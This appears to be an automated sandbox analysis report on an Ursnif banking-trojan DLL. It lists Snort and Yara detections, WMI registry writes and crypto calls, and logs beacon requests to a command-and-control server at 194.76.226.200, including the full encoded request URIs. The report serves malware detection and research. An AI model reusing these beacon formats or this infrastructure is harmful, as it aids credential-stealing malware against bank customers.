Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49746 -> 13.107.42.16:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49749 -> 13.107.42.16:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49749 -> 13.107.42.16:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49752 -> 194.76.226.200:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49752 -> 194.76.226.200:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49753 -> 194.76.226.200:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49753 -> 194.76.226.200:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49754 -> 194.76.226.200:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49754 -> 194.76.226.200:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49755 -> 194.76.226.200:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49755 -> 194.76.226.200:80
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 194.76.226.200 80
            Source: global trafficHTTP traffic detected: GET /drew/GVxzdEn3rJxHPgJaE/ckcbKS4onbSJ/ZdlWFtgOHAM/pJGsS1vTtWNP8h/yNsXRCxcvAA6AXQPJwabF/oYnH6redQswcAwtL/rDlMsMT_2FoiQ_2/BdNrJdcFdtJq9vsrPj/Pi_2B3_2B/dnsHU70OV9c4KUJyE_2F/0ip_2FIZ7Wqza0Ho2lN/KYodlnq6PG5KK9SBFWXHj5/viPS4jjPVWzpA/_2B2JOAM/KOBPUpSnsG9auoSxo_2BhjX/PvM1mRJl_2/FaBIYOp1w1wVY3Kqd/ZfinCIlH/i.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: rundll32.exe, 00000005.00000003.370229041.0000000003374000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.358439185.0000000003374000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.359952251.0000000003374000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.76.226.200/
            Source: rundll32.exe, 00000005.00000003.358439185.0000000003374000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.76.226.200/BFA
            Source: regsvr32.exe, 00000003.00000003.378321458.0000000003347000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.76.226.200/M
            Source: regsvr32.exe, 00000003.00000003.499946286.000000000337C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.370876797.0000000003382000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.517659342.0000000003366000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.509976865.0000000003365000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.517881425.000000000337D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.500987131.0000000003362000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.378321458.0000000003347000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.76.226.200/drew/GVxzdEn3rJxHPgJaE/ckcbKS4onbSJ/ZdlWFtgOHAM/pJGsS1vTtWNP8h/yNsXRCxcvAA6AXQ
            Source: rundll32.exe, 00000005.00000002.498298788.0000000003380000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.76.226.200/drew/S0hO4k1kNWmaIbAIKk6J/C6ltlnn67F9zU4319Wq/SHohWMCDfW7oiPhqwsiIKI/bmU8FVW7o
            Source: rundll32.exe, 00000005.00000003.358348203.0000000003380000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.76.226.200/drew/m0QZKcj4ankL3W/8FVzGu6iQpcBkrTN5v3eZ/A6WzaqZBs9gogbdq/m8YEYG_2B_2FLSM/NM7
            Source: rundll32.exe, 00000004.00000003.498230498.000000000334F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.501303183.000000000334F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.370021803.000000000334C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.492598274.000000000334C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.76.226.200/drew/q2MoEGVRNe15Nk60/LDrmU6_2F0GkU3d/_2F0Knrw_2BLeOfpGj/fbCS28O8a/HzEmaSZQ4r2
            Source: regsvr32.exe, 00000003.00000003.369970075.0000000003382000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.499946286.000000000337C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.455323184.000000000338F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.369984660.000000000338F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.377995492.000000000338F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.370876797.0000000003382000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.370736474.000000000338F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.517881425.000000000337D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.499574749.000000000338F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.509029101.0000000003392000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.518096997.0000000003392000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.76.226.200/drew/qj8KFpDyUAB/xQ_2FW_2FRVQUR/xo7UR19sTv1fTteFGwviu/H1QAugjBS9BAganl/OqUmHFd
            Source: regsvr32.exe, 00000003.00000003.378321458.0000000003347000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.76.226.200/mA
            Source: regsvr32.exe, 00000003.00000003.378321458.0000000003347000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://config.edge.skype.com/
            Source: rundll32.exe, 00000004.00000003.356735881.0000000003341000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.358273332.0000000003341000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://config.edge.skype.com/drew/KsjuChW1FlW/h0G2ROzQWge1fX/1C6hndXvCTbmXNKw7e4fr/CwqIDwnvxPyopc2J/
            Source: regsvr32.exe, 00000003.00000003.363439458.000000000338B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.363565997.000000000338C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://config.edge.skype.com/drew/tFFub3t73gQJ78QDkLr4/gr_2B_2BUJEeehBUVBY/ao0x4PCINZAsF2guaBcZS9/2c
            Source: loaddll32.exe, 00000001.00000003.419223881.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.424590800.0000000006248000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.416179066.00000000064A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.416181802.0000000006078000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001F.00000003.463004006.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000020.00000003.461557697.000002094CD9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
            Source: loaddll32.exe, 00000001.00000003.419223881.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.424590800.0000000006248000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.416179066.00000000064A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.416181802.0000000006078000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001F.00000003.463004006.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000020.00000003.461557697.000002094CD9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
            Source: powershell.exe, 0000000E.00000003.519774884.00000185EC638000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: loaddll32.exe, 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://curlmyip.net
            Source: loaddll32.exe, 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://curlmyip.netJv1GYc8A8hCBIeVDfile://c:
            Source: loaddll32.exe, 00000001.00000003.419223881.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.424590800.0000000006248000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.416179066.00000000064A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.416181802.0000000006078000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001F.00000003.463004006.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000020.00000003.461557697.000002094CD9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
            Source: loaddll32.exe, 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ipinfo.io/ip
            Source: global trafficHTTP traffic detected: GET /drew/XCtMkJNFgr1wO/rqNQ0HN4/ZyJyvokVrq1cpfT_2FjRvTK/tLuchRhy61/VY2_2BDejax1_2FZ_/2B4hja3XPXEF/qOMgeh9PvPf/N8zQpyy6Zc5e9b/4QO0R4yS5UCD1QFYshJGy/yTzTKH0fh7Ht9Zwy/6rUgxnlS7Il_2Fi/FA0gREqRHLz3XsH5AC/GH2iS6XmT/92F7y362W9gTjtIUfvoo/J_2Bt2_2BThMLoUrTFI/Ys7KyYaIys_2B6FXPvybrX/6Ff.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6248, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6100, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4768, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5376, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 3360, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 3088, type: MEMORYSTR
            Source: loaddll32.exe, 00000001.00000002.511144160.00000000012DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            E-Banking Fraud

Source: Yara match | File source: 00000005.00000003.311254885.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.365747529.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.318724371.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000020.00000003.461557697.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.319004486.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000003.463004006.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.313620006.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.318536421.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000020.00000003.461902284.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.318886527.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.310802933.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.419223881.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.318950101.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.318813278.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.357803374.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.416632245.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.360636522.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000003.462719900.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.311195582.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.310405280.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.424590800.0000000006248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.310678862.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.313789835.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.416948546.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.357904969.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.310826841.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.311031834.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000003.462876303.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.311387225.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.418907434.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.310564493.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.311048648.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.311384342.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.418190503.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.418488620.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.318621591.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.313081553.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.312190736.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.310688564.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.358039219.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.311319683.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.310571881.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000020.00000003.461973969.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.419037087.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.310907059.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.359673745.0000000001F7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.312479873.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.370947214.000000000540C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.360822217.000000000536C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.416181802.0000000006078000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.319064007.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000003.463098635.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.310393039.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.313276698.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.313441363.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.312864720.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.416179066.00000000064A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000020.00000003.461743717.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.419113309.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 6248, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 6100, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 4768, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5376, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: control.exe PID: 3360, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: control.exe PID: 3088, type: MEMORYSTR
Source: C:\Windows\explorer.exe | Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_01C178F2 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,1_2_01C178F2
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_031F78F2 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,3_2_031F78F2
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_010578F2 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,5_2_010578F2

System Summary

            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: 61f113091fd0c.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
            Source: 00000001.00000002.511490355.000000000134C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth, description = Detects LNK file with suspicious content, score =
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_01C14BB31_2_01C14BB3
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_01C1436E1_2_01C1436E
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_01C180D01_2_01C180D0
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00DC0DF91_2_00DC0DF9
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00DC0DF71_2_00DC0DF7
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046DF4D01_2_046DF4D0
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046D2CB81_2_046D2CB8
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046E0CB21_2_046E0CB2
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046C68B21_2_046C68B2
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046C2D251_2_046C2D25
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046E1DEA1_2_046E1DEA
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046E01A51_2_046E01A5
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046CF6411_2_046CF641
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_031F436E3_2_031F436E
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_031F4BB33_2_031F4BB3
